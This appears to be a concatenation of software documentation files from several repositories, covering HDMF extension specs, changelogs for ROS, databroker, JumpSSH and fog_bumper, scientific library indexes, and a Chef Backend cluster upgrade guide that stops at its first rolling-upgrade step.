] | null | null | null | docs/source/extensions.rst | d-sot/hdmf | 6df64fe9f2f8163d1c688561c4a5a7ae96ae7284 | [
"BSD-3-Clause-LBNL"
] | null | null | null | .. _extending-standard:
Extending standards
===================
The following page will discuss how to extend a standard using HDMF.
.. _creating-extensions:
Creating new Extensions
-----------------------
Standards specified using HDMF are designed to be extended. Extension for a standard can be done so using classes
provided in the :py:mod:`hdmf.spec` module. The classes :py:class:`~hdmf.spec.spec.GroupSpec`,
:py:class:`~hdmf.spec.spec.DatasetSpec`, :py:class:`~hdmf.spec.spec.AttributeSpec`, and :py:class:`~hdmf.spec.spec.LinkSpec`
can be used to define custom types.
Attribute Specifications
^^^^^^^^^^^^^^^^^^^^^^^^
Specifying attributes is done with :py:class:`~hdmf.spec.spec.AttributeSpec`.
.. code-block:: python
from hdmf.spec import AttributeSpec
spec = AttributeSpec('bar', 'a value for bar', 'float')
Dataset Specifications
^^^^^^^^^^^^^^^^^^^^^^
Specifying datasets is done with :py:class:`~hdmf.spec.spec.DatasetSpec`.
.. code-block:: python
from hdmf.spec import DatasetSpec
spec = DatasetSpec('A custom data type',
name='qux',
attribute=[
AttributeSpec('baz', 'a value for baz', 'str'),
],
shape=(None, None))
Using datasets to specify tables
++++++++++++++++++++++++++++++++
Tables can be specified using :py:class:`~hdmf.spec.spec.DtypeSpec`. To specify a table, provide a
list of :py:class:`~hdmf.spec.spec.DtypeSpec` objects to the *dtype* argument.
.. code-block:: python
from hdmf.spec import DatasetSpec, DtypeSpec
spec = DatasetSpec('A custom data type',
name='qux',
attribute=[
AttributeSpec('baz', 'a value for baz', 'str'),
],
dtype=[
DtypeSpec('foo', 'column for foo', 'int'),
DtypeSpec('bar', 'a column for bar', 'float')
])
Group Specifications
^^^^^^^^^^^^^^^^^^^^
Specifying groups is done with the :py:class:`~hdmf.spec.spec.GroupSpec` class.
.. code-block:: python
from hdmf.spec import GroupSpec
spec = GroupSpec('A custom data type',
name='quux',
attributes=[...],
datasets=[...],
groups=[...])
Data Type Specifications
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
:py:class:`~hdmf.spec.spec.GroupSpec` and :py:class:`~hdmf.spec.spec.DatasetSpec` use the arguments `data_type_inc` and
`data_type_def` for declaring new types and extending existing types. New types are specified by setting the argument
`data_type_def`. New types can extend an existing type by specifying the argument `data_type_inc`.
Create a new type
.. code-block:: python
from hdmf.spec import GroupSpec
# A list of AttributeSpec objects to specify new attributes
addl_attributes = [...]
# A list of DatasetSpec objects to specify new datasets
addl_datasets = [...]
# A list of DatasetSpec objects to specify new groups
addl_groups = [...]
spec = GroupSpec('A custom data type',
attributes=addl_attributes,
datasets=addl_datasets,
groups=addl_groups,
data_type_def='MyNewType')
Extend an existing type
.. code-block:: python
from hdmf.spec import GroupSpec
# A list of AttributeSpec objects to specify additional attributes or attributes to be overridden
addl_attributes = [...]
# A list of DatasetSpec objects to specify additional datasets or datasets to be overridden
addl_datasets = [...]
# A list of GroupSpec objects to specify additional groups or groups to be overridden
addl_groups = [...]
spec = GroupSpec('An extended data type',
attributes=addl_attributes,
datasets=addl_datasets,
groups=addl_groups,
data_type_inc='SpikeEventSeries',
data_type_def='MyExtendedSpikeEventSeries')
Existing types can be instantiated by specifying `data_type_inc` alone.
.. code-block:: python
from hdmf.spec import GroupSpec
# use another GroupSpec object to specify that a group of type
# ElectricalSeries should be present in the new type defined below
addl_groups = [ GroupSpec('An included ElectricalSeries instance',
data_type_inc='ElectricalSeries') ]
spec = GroupSpec('An extended data type',
groups=addl_groups,
data_type_inc='SpikeEventSeries',
data_type_def='MyExtendedSpikeEventSeries')
Datasets can be extended in the same manner (with regard to `data_type_inc` and `data_type_def`,
by using the class :py:class:`~hdmf.spec.spec.DatasetSpec`.
.. _saving-extensions:
Saving Extensions
-----------------
Extensions are used by including them in a loaded namespace. Namespaces and extensions need to be saved to file
for downstream use. The class :py:class:`~hdmf.spec.write.NamespaceBuilder` can be used to create new namespace and
specification files.
Create a new namespace with extensions
.. code-block:: python
from hdmf.spec import GroupSpec, NamespaceBuilder
# create a builder for the namespace
ns_builder = NamespaceBuilder("Extension for use in my laboratory", "mylab", ...)
# create extensions
ext1 = GroupSpec('A custom SpikeEventSeries interface',
attributes=[...]
datasets=[...],
groups=[...],
data_type_inc='SpikeEventSeries',
data_type_def='MyExtendedSpikeEventSeries')
ext2 = GroupSpec('A custom EventDetection interface',
attributes=[...]
datasets=[...],
groups=[...],
data_type_inc='EventDetection',
data_type_def='MyExtendedEventDetection')
# add the extension
ext_source = 'mylab.specs.yaml'
ns_builder.add_spec(ext_source, ext1)
ns_builder.add_spec(ext_source, ext2)
# include an existing namespace - this will include all specifications in that namespace
ns_builder.include_namespace('collab_ns')
# save the namespace and extensions
ns_path = 'mylab.namespace.yaml'
ns_builder.export(ns_path)
.. tip::
Using the API to generate extensions (rather than writing YAML sources directly) helps avoid errors in the specification
(e.g., due to missing required keys or invalid values) and ensure compliance of the extension definition with the
HDMF specification language. It also helps with maintenance of extensions, e.g., if extensions have to be ported to
newer versions of the `specification language <https://schema-language.readthedocs.io/en/latest/>`_
in the future.
.. _incorporating-extensions:
Incorporating extensions
------------------------
HDMF supports extending existing data types.
Extensions must be registered with HDMF to be used for reading and writing of custom data types.
The following code demonstrates how to load custom namespaces.
.. code-block:: python
from hdmf import load_namespaces
namespace_path = 'my_namespace.yaml'
load_namespaces(namespace_path)
.. note::
This will register all namespaces defined in the file ``'my_namespace.yaml'``.
Container : Representing custom data
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
To read and write custom data, corresponding :py:class:`~hdmf.container.Container` classes must be associated with their
respective specifications. :py:class:`~hdmf.container.Container` classes are associated with their respective
specification using the decorator :py:func:`~hdmf.common.register_class`.
The following code demonstrates how to associate a specification with the :py:class:`~hdmf.container.Container` class
that represents it.
.. code-block:: python
from hdmf.common import register_class
from hdmf.container import Container
@register_class('MyExtension', 'my_namespace')
class MyExtensionContainer(Container):
...
:py:func:`~hdmf.common.register_class` can also be used as a function.
.. code-block:: python
from hdmf.common import register_class
from hdmf.container import Container
class MyExtensionContainer(Container):
...
register_class(data_type='MyExtension', namespace='my_namespace', container_cls=MyExtensionContainer)
If you do not have an :py:class:`~hdmf.container.Container` subclass to associate with your extension specification,
a dynamically created class is created by default.
To use the dynamic class, you will need to retrieve the class object using the function :py:func:`~hdmf.common.get_class`.
Once you have retrieved the class object, you can use it just like you would a statically defined class.
.. code-block:: python
from hdmf.common import get_class
MyExtensionContainer = get_class('my_namespace', 'MyExtension')
my_ext_inst = MyExtensionContainer(...)
If using iPython, you can access documentation for the class's constructor using the help command.
ObjectMapper : Customizing the mapping between Container and the Spec
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
If your :py:class:`~hdmf.container.Container` extension requires custom mapping of the
:py:class:`~hdmf.container.Container` class for reading and writing, you will need to implement and register a custom
:py:class:`~hdmf.build.objectmapper.ObjectMapper`.
:py:class:`~hdmf.build.objectmapper.ObjectMapper` extensions are registered with the decorator
:py:func:`~hdmf.common.register_map`.
.. code-block:: python
from hdmf.common import register_map
from hdmf.build import ObjectMapper
@register_map(MyExtensionContainer)
class MyExtensionMapper(ObjectMapper)
...
:py:func:`~hdmf.common.register_map` can also be used as a function.
.. code-block:: python
from hdmf.common import register_map
from hdmf.build import ObjectMapper
class MyExtensionMapper(ObjectMapper)
...
register_map(MyExtensionContainer, MyExtensionMapper)
.. tip::
ObjectMappers allow you to customize how objects in the spec are mapped to attributes of your Container in
Python. This is useful, e.g., in cases where you want to customize the default mapping.
For an overview of the concepts of containers, spec, builders, object mappers in HDMF see also
:ref:`software-architecture`
.. _documenting-extensions:
Documenting Extensions
----------------------
Coming soon!
Further Reading
---------------
* **Specification Language:** For a detailed overview of the specification language itself see https://schema-language.readthedocs.io/en/latest/
| 34.699367 | 144 | 0.6601 |
23fc56b5d5184c4ad2e56a6147d5bf7928cf682a | 273 | rst | reStructuredText | Source Files/hector_quadrotor_tutorial/src/hector_models/hector_xacro_tools/CHANGELOG.rst | AntoineHX/OMPL_Planning | 60b5fbb90799d89635956580bc2f596ca4db658f | [
"MIT"
] | null | null | null | Source Files/hector_quadrotor_tutorial/src/hector_models/hector_xacro_tools/CHANGELOG.rst | AntoineHX/OMPL_Planning | 60b5fbb90799d89635956580bc2f596ca4db658f | [
"MIT"
] | null | null | null | Source Files/hector_quadrotor_tutorial/src/hector_models/hector_xacro_tools/CHANGELOG.rst | AntoineHX/OMPL_Planning | 60b5fbb90799d89635956580bc2f596ca4db658f | [
"MIT"
] | null | null | null | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package hector_xacro_tools
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
0.3.2 (2014-09-01)
------------------
0.3.1 (2014-03-30)
------------------
0.3.0 (2013-09-02)
------------------
* catkinized stack hector_models
| 19.5 | 40 | 0.358974 |
a107db51f483585fd44ca0a93a874daf7f9fbf17 | 1,776 | rst | reStructuredText | doc/source/whats_new.rst | jklynch/databroker | 9d228396c7759cf9b1463b7f87647f29f5efb357 | [
"BSD-3-Clause"
] | null | null | null | doc/source/whats_new.rst | jklynch/databroker | 9d228396c7759cf9b1463b7f87647f29f5efb357 | [
"BSD-3-Clause"
] | null | null | null | doc/source/whats_new.rst | jklynch/databroker | 9d228396c7759cf9b1463b7f87647f29f5efb357 | [
"BSD-3-Clause"
] | null | null | null | .. _whats_new:
Release History
===============
A catalog of new features, improvements, and bug-fixes in each release. Follow
links to the relevant GitHub issue or pull request for specific code changes
and any related discussion.
.. include:: whats_new/v1.1.0.txt
.. include:: whats_new/v1.0.6.txt
.. include:: whats_new/v1.0.5.txt
.. include:: whats_new/v1.0.4.txt
.. include:: whats_new/v1.0.3.txt
.. include:: whats_new/v1.0.2.txt
.. include:: whats_new/v1.0.1.txt
.. include:: whats_new/v1.0.0.txt
.. include:: whats_new/v0.13.3.txt
.. include:: whats_new/v0.13.2.txt
.. include:: whats_new/v0.13.1.txt
.. include:: whats_new/v0.13.0.txt
.. include:: whats_new/v0.12.2.txt
.. include:: whats_new/v0.12.1.txt
.. include:: whats_new/v0.12.0.txt
.. include:: whats_new/v0.11.3.txt
.. include:: whats_new/v0.11.2.txt
.. include:: whats_new/v0.11.1.txt
.. include:: whats_new/v0.11.0.txt
.. include:: whats_new/v0.10.0.txt
.. include:: whats_new/v0.9.4.txt
.. include:: whats_new/v0.9.3.txt
.. include:: whats_new/v0.9.2.txt
.. include:: whats_new/v0.9.1.txt
.. include:: whats_new/v0.9.0.txt
.. include:: whats_new/v0.8.4.txt
.. include:: whats_new/v0.8.3.txt
.. include:: whats_new/v0.8.2.txt
.. include:: whats_new/v0.8.1.txt
.. include:: whats_new/v0.8.0.txt
.. include:: whats_new/v0.7.0.txt
.. include:: whats_new/v0.6.2.txt
.. include:: whats_new/v0.6.1.txt
.. include:: whats_new/v0.6.0.txt
.. include:: whats_new/v0.5.0.txt
.. include:: whats_new/v0.4.1.txt
.. include:: whats_new/v0.4.0.txt
.. include:: whats_new/v0.3.3.txt
.. include:: whats_new/v0.3.2.txt
.. include:: whats_new/v0.3.1.txt
.. include:: whats_new/v0.3.0.txt
.. include:: whats_new/v0.2.2.txt
.. include:: whats_new/v0.2.1.txt
.. include:: whats_new/v0.2.0.txt
.. include:: whats_new/v0.0.6.txt
| 32.290909 | 78 | 0.6875 |
9090b540fc498a73ab673759b7bba7b9efc2f817 | 48 | rst | reStructuredText | doc/psiturk_org_api.rst | l3atbc/psiturk | 85ffa74030ec2a5f4142e5bca63b2f8b8807d7c6 | [
"MIT"
] | 6 | 2015-02-13T12:46:07.000Z | 2020-02-20T08:56:15.000Z | doc/psiturk_org_api.rst | l3atbc/psiturk | 85ffa74030ec2a5f4142e5bca63b2f8b8807d7c6 | [
"MIT"
] | null | null | null | doc/psiturk_org_api.rst | l3atbc/psiturk | 85ffa74030ec2a5f4142e5bca63b2f8b8807d7c6 | [
"MIT"
] | 1 | 2018-07-27T06:39:46.000Z | 2018-07-27T06:39:46.000Z | psiturk.org RESTful API
======================== | 24 | 24 | 0.416667 |
8c055933fd0d9deb5f9ef2b7eb6ba9a9c8e0dfd5 | 1,259 | rst | reStructuredText | docs/admin/media.rst | khchine5/book | b6272d33d49d12335d25cf0a2660f7996680b1d1 | [
"BSD-2-Clause"
] | 1 | 2018-01-12T14:09:58.000Z | 2018-01-12T14:09:58.000Z | docs/admin/media.rst | khchine5/book | b6272d33d49d12335d25cf0a2660f7996680b1d1 | [
"BSD-2-Clause"
] | 4 | 2018-02-06T19:53:10.000Z | 2019-08-01T21:47:44.000Z | docs/admin/media.rst | khchine5/book | b6272d33d49d12335d25cf0a2660f7996680b1d1 | [
"BSD-2-Clause"
] | null | null | null | The `media` directory
=====================
The `media` directory is a subdirectory of your project directory,
containing symbolic links to various sets of static files which Lino
expects to be served under the `/media/` location.
Lino manages the content of this directory more or less automatically,
but **only if it exists** (and if `www-data` has write permission on
it).
The *development server* will mount it automatically.
On a *production server* you will add a line like the following
to your Apache config::
Alias /media/ /usr/local/django/myproject/media/
Description of the individual `media` sub-directories:
- /media/lino/ : Lino's :srcref`/media` directory
- /media/extjs/ : ExtJS library (:attr:`lino.Lino.extjs_root`)
- /media/extensible/ : Ext.ensible library (:attr:`lino.Lino.extensible_root`)
- /media/tinymce/ : TinyMCE library (:attr:`lino.Lino.tinymce_root`)
Lino will automatically create the following subdirectories
if they don't exist:
- /media/cache/ : temporary files created by Lino
- /media/uploads/ : Uploaded files
- /media/webdav/ : User-editable files
There may be application-specific media subdirectories,
for example:
- /media/beid/ : image files for pcsw.models.PersonDetail
| 32.282051 | 78 | 0.729944 |
c0cbb7769ca358a6fdf946bccf138805988ee658 | 6,134 | rst | reStructuredText | documentation/source/reference/statmech/index.rst | faribas/RMG-Py | 6149e29b642bf8da9537e2db98f15121f0e040c7 | [
"MIT"
] | 1 | 2017-12-18T18:43:22.000Z | 2017-12-18T18:43:22.000Z | documentation/source/reference/statmech/index.rst | speth/RMG-Py | 1d2c2b684580396e984459d9347628a5ceb80e2e | [
"MIT"
] | 72 | 2016-06-06T18:18:49.000Z | 2019-11-17T03:21:10.000Z | documentation/source/reference/statmech/index.rst | speth/RMG-Py | 1d2c2b684580396e984459d9347628a5ceb80e2e | [
"MIT"
] | 3 | 2017-09-22T15:47:37.000Z | 2021-12-30T23:51:47.000Z | *********************************************
Statistical mechanics (:mod:`rmgpy.statmech`)
*********************************************
.. module:: rmgpy.statmech
The :mod:`rmgpy.statmech` subpackage contains classes that represent various
statistical mechanical models of molecular degrees of freedom. These models
enable the computation of macroscopic parameters (e.g. thermodynamics, kinetics,
etc.) from microscopic parameters.
A molecular system consisting of :math:`N` atoms is described by :math:`3N`
molecular degrees of freedom. Three of these modes involve translation of the
system as a whole. Another three of these modes involve rotation of the system
as a whole, unless the system is linear (e.g. diatomics), for which there are
only two rotational modes. The remaining :math:`3N-6` (or :math:`3N-5` if
linear) modes involve internal motion of the atoms within the system. Many of
these modes are well-described as harmonic oscillations, while others are
better modeled as torsional rotations around a bond within the system.
Molecular degrees of freedom are mathematically represented using the
Schrodinger equation :math:`\hat{H} \Psi = E \Psi`. By solving the
Schrodinger equation, we can determine the available energy states of the
molecular system, which enables computation of macroscopic parameters.
Depending on the temperature of interest, some modes (e.g. vibrations) require
a quantum mechanical treatment, while others (e.g. translation, rotation) can
be described using a classical solution.
Translational degrees of freedom
================================
.. currentmodule:: rmgpy.statmech
=============================== ================================================
Class Description
=============================== ================================================
:class:`IdealGasTranslation` A model of three-dimensional translation of an ideal gas
=============================== ================================================
Rotational degrees of freedom
=============================
.. currentmodule:: rmgpy.statmech
=========================== ====================================================
Class Description
=========================== ====================================================
:class:`LinearRotor` A model of two-dimensional rigid rotation of a linear molecule
:class:`NonlinearRotor` A model of three-dimensional rigid rotation of a nonlinear molecule
:class:`KRotor` A model of one-dimensional rigid rotation of a K-rotor
:class:`SphericalTopRotor` A model of three-dimensional rigid rotation of a spherical top molecule
=========================== ====================================================
Vibrational degrees of freedom
==============================
.. currentmodule:: rmgpy.statmech
=========================== ====================================================
Class Description
=========================== ====================================================
:class:`HarmonicOscillator` A model of a set of one-dimensional harmonic oscillators
=========================== ====================================================
Torsional degrees of freedom
============================
.. currentmodule:: rmgpy.statmech
=========================== ====================================================
Class Description
=========================== ====================================================
:class:`HinderedRotor` A model of a one-dimensional hindered rotation
=========================== ====================================================
The Schrodinger equation
========================
.. currentmodule:: rmgpy.statmech.schrodinger
=============================== ================================================
Class Description
=============================== ================================================
:func:`getPartitionFunction` Calculate the partition function at a given temperature from energy levels and degeneracies
:func:`getHeatCapacity` Calculate the dimensionless heat capacity at a given temperature from energy levels and degeneracies
:func:`getEnthalpy` Calculate the enthalpy at a given temperature from energy levels and degeneracies
:func:`getEntropy` Calculate the entropy at a given temperature from energy levels and degeneracies
:func:`getSumOfStates` Calculate the sum of states for a given energy domain from energy levels and degeneracies
:func:`getDensityOfStates` Calculate the density of states for a given energy domain from energy levels and degeneracies
=============================== ================================================
Convolution
===========
.. currentmodule:: rmgpy.statmech.schrodinger
======================= ========================================================
Class Description
======================= ========================================================
:func:`convolve` Return the convolution of two arrays
:func:`convolveBS` Convolve a degree of freedom into a density or sum of states using the Beyer-Swinehart (BS) direct count algorithm
:func:`convolveBSSR` Convolve a degree of freedom into a density or sum of states using the Beyer-Swinehart-Stein-Rabinovitch (BSSR) direct count algorithm
======================= ========================================================
Molecular conformers
====================
.. currentmodule:: rmgpy.statmech
======================= ========================================================
Class Description
======================= ========================================================
:class:`Conformer` A model of a molecular conformation
======================= ========================================================
.. toctree::
:hidden:
idealgastranslation
linearrotor
nonlinearrotor
krotor
sphericaltoprotor
harmonicoscillator
hinderedrotor
schrodinger
conformer
| 43.503546 | 158 | 0.509455 |
2f87d9ea4399afb56e856e7d4420daf01cde8430 | 1,305 | rst | reStructuredText | docs/for-dev/zhcls/generator.rst | xiaoxing1120/zhihu-spider1.0 | 932147102033ed52660564b2a2fa94d23e99c0be | [
"MIT"
] | 6 | 2019-11-19T02:09:12.000Z | 2022-03-01T10:12:16.000Z | docs/for-dev/zhcls/generator.rst | xiaoxing1120/zhihu-spider1.0 | 932147102033ed52660564b2a2fa94d23e99c0be | [
"MIT"
] | null | null | null | docs/for-dev/zhcls/generator.rst | xiaoxing1120/zhihu-spider1.0 | 932147102033ed52660564b2a2fa94d23e99c0be | [
"MIT"
] | 12 | 2017-10-18T11:01:34.000Z | 2021-06-02T01:45:24.000Z | Paging data process - 多页数据处理
==================================
intro - 介绍
------------
知乎有很多列表型数据,比如问题的答案,我的关注者,专栏的文章,等等。
这些数据在知乎的 API 获取的时候是间断的,比如,每次获取 20 个,在手机 APP
上就体现为继续上划加载更多。这些数据处理的逻辑类似,数据的格式也类似,
只是最后列表项中的对象不同。
常见的多页数据的 JSON 如下:
.. code-block:: python
{
'paging': {
'previous': 'previous page url' ,
'next': 'next page url',
'is_end': False, # or True
},
'data': [
{
'type': 'answer',
'id': 'xxxx',
'created_time': '14xxxxx'
# many attr
},
{
# like last one
},
# many many objects
],
}
为了 DYR,这些逻辑被抽象成 :any:`BaseGenerator` 基类,其他类通过继承基类,
来实现创建不同对象的功能。
效果见::ref:`intro_generator_attr`
Base class - 基类
-----------------
.. autoclass:: zhihu_oauth.zhcls.generator.BaseGenerator
:members:
:undoc-members:
:private-members:
:special-members: __init__, __getitem__, __next__, __iter__
Childs - 子类
---------------
:any:`BaseGenerator` 的子类才是真正可以使用的类。它们重载了 ``_build_obj`` 方法。
因其他结构无变化,故文档省略。
.. automodule:: zhihu_oauth.zhcls.generator
:members:
:exclude-members: BaseGenerator
:undoc-members:
:private-members:
:special-members: __init__
| 20.390625 | 63 | 0.539464 |
6c755b41d6ceda01f51a39d10988e0d8ebb7e59c | 79 | rst | reStructuredText | docs/usage.rst | nollety/tengen | e11d9796638cc7538b2c946d163784c470fcea28 | [
"MIT"
] | null | null | null | docs/usage.rst | nollety/tengen | e11d9796638cc7538b2c946d163784c470fcea28 | [
"MIT"
] | 87 | 2021-07-05T07:17:35.000Z | 2022-03-29T07:29:27.000Z | docs/usage.rst | nollety/tengen | e11d9796638cc7538b2c946d163784c470fcea28 | [
"MIT"
] | null | null | null | Usage
=====
.. click:: tengen.__main__:main
:prog: tengen
:nested: full
| 11.285714 | 31 | 0.607595 |
5715a704d957edf913dc7c67f71dd8c2aa1d01d3 | 651 | rst | reStructuredText | CHANGELOG.rst | tiiuae/fog_bumper | ec2cc7063ec1d6454c604cf74ec5496357dc6062 | [
"BSD-3-Clause"
] | null | null | null | CHANGELOG.rst | tiiuae/fog_bumper | ec2cc7063ec1d6454c604cf74ec5496357dc6062 | [
"BSD-3-Clause"
] | 1 | 2021-11-18T14:36:18.000Z | 2021-11-18T14:44:43.000Z | CHANGELOG.rst | tiiuae/fog_bumper | ec2cc7063ec1d6454c604cf74ec5496357dc6062 | [
"BSD-3-Clause"
] | null | null | null | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package fog_bumper
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
0.0.1 (2021-11-30)
-----------
* let launch to be executable
* Merge pull request `#1 <https://github.com/tiiuae/fog_bumper/issues/1>`_ from tiiuae/ci-scripts
Ci scripts
* update versions
* add github action
* Add ci-scripts
* added timer instead of separate thread
* fixed remapping in launch file
* fixed fov of sensors
* update README
* working version of bumper
* first compilable version
* renamed cpp file
* add files, modified Cmakelist and package.xml
* add gitignore
* first commit
* Contributors: Esa Kulmala, Jari Nippula, Vojtech Spurny
| 27.125 | 97 | 0.675883 |
9d5b0551f83e8f2e45e78ec15abf749acf783ea2 | 741 | rst | reStructuredText | docs/source/index.rst | spukhafte-sys/cdce9xx | 3723b0b4843da56de8eb399877d0d32c4e5a4ad2 | [
"MIT"
] | null | null | null | docs/source/index.rst | spukhafte-sys/cdce9xx | 3723b0b4843da56de8eb399877d0d32c4e5a4ad2 | [
"MIT"
] | 1 | 2022-02-17T18:45:55.000Z | 2022-02-17T22:56:27.000Z | docs/source/index.rst | spukhafte-sys/cdce9xx | 3723b0b4843da56de8eb399877d0d32c4e5a4ad2 | [
"MIT"
] | null | null | null | .. CDCE9xx documentation master file, created by
sphinx-quickstart on Fri Feb 11 13:38:35 2022.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to CDCE9xx's documentation!
===================================
**CDCE9xx** is a Python3 command line tool and library for controlling any of the
Texas Instruments CDCE9xx family of programmable spread-spectrum clock generators:
* CDCE(L)913: 1 PLL, 3 Outputs
* CDCE(L)925: 2 PLLs, 5 Outputs
* CDCE(L)937: 3 PLLs, 7 Outputs
* CDCE(L)949: 4 PLLs, 9 Outputs
.. toctree::
:maxdepth: 2
:caption: Contents:
modules
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
| 25.551724 | 82 | 0.672065 |
37b2b836d9c2f21ef1ac317b6d668d01445d29c7 | 3,841 | rst | reStructuredText | CHANGES.rst | t-cas/JumpSSH | 9f8529690064d11c9ec965a0340f220669bd7663 | [
"MIT"
] | null | null | null | CHANGES.rst | t-cas/JumpSSH | 9f8529690064d11c9ec965a0340f220669bd7663 | [
"MIT"
] | null | null | null | CHANGES.rst | t-cas/JumpSSH | 9f8529690064d11c9ec965a0340f220669bd7663 | [
"MIT"
] | null | null | null | 1.6.5 (11/03/2020)
------------------
- [Bug] :issue:`152`: Remove pkg_info.json file and replace it with python file to avoid access issue at runtime
1.6.4 (08/24/2020)
------------------
- [Bug] :issue:`109`: Fix automated session closure handled by python garbage collection
- [Bug] :issue:`120`: Fix get_remote_session not respecting 'timeout' parameter
- [Bug] :issue:`139`: Fix run_cmd raising AuthenticationException if no agent is running
- [Improvement][Tests]: use flaky package to automatically rerun flaky tests
1.6.3 (03/12/2020)
------------------
- [Improvement]: remove pytest-runner from setup_requires as this is deprecated for security reasons, see https://github.com/pytest-dev/pytest-runner
- [Improvement]: use only fixed test dependencies in requirements_dev.txt
1.6.1 (04/08/2019)
------------------
- [Bug] :issue:`51`: 'get' file was failing if the remote file is binary. Thanks to :user:`pshaobow` for the report.
- [Feature]: Ability to use any parameter of `paramiko.client.SSHClient.connect` in `get_remote_session`, was forgotten during implementation of :issue:`43`.
- [Improvement]: tests migrated to docker-compose to setup docker environment
1.5.1 (01/14/2019)
------------------
- [Feature] :issue:`43`: Ability to use any parameter of paramiko.client.SSHClient.connect in SSHSession.
1.4.1 (03/31/2018)
------------------
- [Bug] :issue:`33`: Fix download of file owned by root with `SSHSession.get`
- [Bug] : Automatically open closed session when calling SSHSession.put. Thanks to :user:`fmaupas` for the fix.
1.4.0 (01/29/2018)
------------------
- [Feature] :issue:`29`: Expose compression support from Paramiko (inherited from SSH).
Thanks to :user:`fmaupas` for the contribution.
1.3.2 (12/17/2017)
------------------
- [Bug] :issue:`23`: do not print `byte` but `str` in continuous output when running command with python3.
Thanks to :user:`nicholasbishop` for the report.
1.3.1 (09/15/2017)
------------------
- fix interruption of remote command when transport channel is already closed
1.3.0 (09/14/2017)
------------------
- allow to conceal part of the command run in logs specifying list of pattern in silent parameter (regexp format)
For example, if a password is specified in command you may want to conceal it in logs but still want to log the
rest of the command run
- ability to customize success exit code when calling run_cmd so that an exit code different from 0 do not raise
any exception. Success exit code can be an int or even a list of int if several exit codes are considered a success.
- ability to retry remote command until success or max retry is reached
- ability to forward Ctrl-C to remote host in order to interrupt remote command before stopping local script
1.2.1 (07/27/2017)
------------------
- reduce logging level of some logs
- propagate missing 'silent' parameter in restclient module to run_cmd to control logging
1.2.0 (07/24/2017)
------------------
- automatically open inactive session when running command on it
- automatically open inactive jump session when requesting remote session
1.1.0 (07/20/2017)
------------------
- Each ssh session can be used as a jump server to access multiple remote sessions in parallel. Only 1 remote
session per jump server was allowed before.
- ability to customize retry interval when opening a ssh session
1.0.2 (07/14/2017)
------------------
- Fix run of shell builtins commands (source, ...) when impersonating another user as they cannot be executed
without the shell and by default, sudo do not run shell
1.0.1 (06/11/2017)
------------------
- Fix BadHostKeyException raised by paramiko when reusing same ssh session object to connect to a different
remote host having same IP than previous host (just TCP port is different)
1.0.0 (05/24/2017)
------------------
- First release
| 45.188235 | 157 | 0.700599 |
cfc8a40e904a8e8545f72a26a526645d39dd5cbd | 5,345 | rst | reStructuredText | chef_master/source/upgrade_server_ha_v2.rst | gavingmiller/chef-web-docs | 894bcbd0bdf8a71a37f04a56c3d02cf69ff43283 | [
"CC-BY-3.0"
] | null | null | null | chef_master/source/upgrade_server_ha_v2.rst | gavingmiller/chef-web-docs | 894bcbd0bdf8a71a37f04a56c3d02cf69ff43283 | [
"CC-BY-3.0"
] | null | null | null | chef_master/source/upgrade_server_ha_v2.rst | gavingmiller/chef-web-docs | 894bcbd0bdf8a71a37f04a56c3d02cf69ff43283 | [
"CC-BY-3.0"
] | null | null | null | =====================================================
High Availability: Backend Cluster
=====================================================
`[edit on GitHub] <https://github.com/chef/chef-web-docs/blob/master/chef_master/source/upgrade_server_ha_v2.rst>`__
.. tag chef_automate_mark
.. image:: ../../images/chef_automate_full.png
:width: 40px
:height: 17px
.. danger:: This documentation covers an outdated version of Chef Automate. See the `Chef Automate site <https://automate.chef.io/docs/quickstart/>`__ for current documentation. The new Chef Automate includes newer out-of-the-box compliance profiles, an improved compliance scanner with total cloud scanning functionality, better visualizations, role-based access control and many other features.
.. end_tag
This topic describes the process of upgrading a highly available Chef server cluster.
.. note:: .. tag chef_subscriptions
This feature is included as part of the Chef Automate license agreement and is `available via subscription <https://www.chef.io/pricing/>`_.
.. end_tag
Overview
=====================================================
These instructions cover the process of upgrading a Chef Backend cluster. Please refer to the appropriate directions for the version of Chef Backend you are using, and the version you intend to upgrade to:
* `Chef Backend 1.x to 2.x Upgrade`_ (downtime upgrade)
* `Chef Backend 1.x to 1.x Upgrade`_ (rolling upgrade)
Chef Backend 1.x to 2.x Upgrade
=====================================================
.. warning:: Upgrading from Chef Backend 1.x to Chef Backend 2.x requires full cluster downtime.
#. Identify the node with the **leader** role using the ``chef-backend-ctl cluster-status`` command:
.. code-block:: none
Name IP GUID Role PG ES
backend-1 192.168.33.215 dc0c6ea77a751f94037cd950e8451fa3 leader leader not_master
backend-2 192.168.33.216 008782c59d3628b6bb7f43556ac0c66c follower follower not_master
backend-3 192.168.33.217 1af654172b1830927a571d9a5ba7965b follower follower master
In this example, ``backend-1`` is the **leader** node, as indicated by its role in the **Role** column.
#. Install the new Chef Backend package on all nodes in the cluster:
* RHEL and CentOS:
.. code-block:: bash
yum install PATH_TO_FILE.rpm
* Debian and Ubuntu:
.. code-block:: bash
dpkg -i PATH_TO_FILE.deb
#. On the leader, run the following command to take the node down for the upgrade:
.. code-block:: bash
chef-backend-ctl down-for-upgrade
#. Then issue the same command on the follower nodes:
.. code-block:: bash
chef-backend-ctl down-for-upgrade
#. Initiate the upgrade on the follower nodes first:
.. code-block:: bash
chef-backend-ctl upgrade
#. Then initiate the upgrade on the leader node:
.. code-block:: bash
chef-backend-ctl upgrade
#. On any Chef Server frontend nodes using the Chef Backend cluster upgraded in the previous steps, run:
.. code-block:: bash
chef-server-ctl reconfigure
#. To continue the upgrades on Chef Server frontends using this backend cluster, see `Upgrade Frontends Associated with a Chef Backend Cluster <https://docs.chef.io/install_server_ha.html#upgrading-chef-server-on-the-frontend-machines>`_
Chef Backend 1.x to 1.x Upgrade
=====================================================
.. note:: The procedure assumes that the new chef-backend package has been copied to all of the nodes.
Step 1: Block Failover
-----------------------------------------------------
